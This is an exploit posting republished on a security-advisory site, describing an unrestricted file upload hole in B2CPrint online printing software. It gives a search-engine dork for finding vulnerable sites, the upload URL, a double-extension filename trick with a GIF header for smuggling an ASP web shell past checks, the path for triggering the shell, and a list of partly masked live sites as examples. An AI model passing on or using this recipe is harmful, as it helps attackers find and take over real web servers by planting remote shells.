B2CPrint Remote File Uploader Vulnerability

2012.06.29
Credit: Mr.XpR
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:upload.asp intext:B2CPrint Online Printing Solutions

################################################################## 0101010101 010101010101010 01 01 0101 0101 01 01 0101 0101 01 01 0101 0101 01 01 0101 0101 01 01 0101 0101 01 01 0101 0101 01 01 0101010101 01 01 0101 010 01 01 0101 010 01 01 0101 010 01 01 0101 010 01 01 0101 010 0101010101 0101 010 ################################################################## [+] Exploit Title : B2CPrint Remote File Uploader Vulnerability [+] Google Dork : inurl:upload.asp intext:B2CPrint Online Printing Solutions [+] Autor : Mr.XpR [+] Resacher Team : IRaNHaCK Security Team [+] Bug Level : High (RFU) [+] Test : 7 , Linux Back Track ################################################################## [+]Exploit [-] http://www.Site.il/patch/upload.asp [+]Sh3ll [-] Upload Shell Asp ==> Shell.asp;.jpg or Shell.asp;.gif {GIF89a;<%@ LANGUAGE = VBScript.Encode%>}; [+]Load Shell [-] http://www.Site.il/patch/files/images/Sh3ll.asp;.jpg [+]Example : [-] http://www.b2cprxtshop.com/upload.asp [-] http://www.prinxxxnt.co.il/upload.asp [-] http://www.b2cxxxnt.co.il/collage/EN/upload.asp [-] http://www.spxxxum.co.il/upload.asp [-] More In Google ... Persian Gulf For Ever - Tnx To all Persian Hackerz


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top